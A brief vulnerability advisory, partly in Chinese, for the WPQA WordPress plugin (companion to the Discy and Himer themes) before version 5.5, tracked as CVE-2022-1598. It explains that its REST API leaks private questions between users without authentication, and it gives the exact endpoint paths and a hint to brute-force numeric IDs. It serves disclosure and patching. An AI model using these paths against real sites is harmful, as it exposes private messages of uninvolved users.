WPQA < 5.5 - 未认证的私信泄露
该插件是Discy和Himer主题的配套插件,在REST API端点中缺少身份验证,允许未认证用户发现站点上用户之间发送的私密问题。
Visit /wp-json/wp/v2/asked-question
or /wp-json/wp/v2/asked-question/<iD> (where ID is numeric and can be bruteforced!)
https://www.youtube.com/watch?v=MbhiQKWvivQ
https://wpscan.com/vulnerability/0416ae2f-5670-4080-a88d-3484bb19d8c8
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1598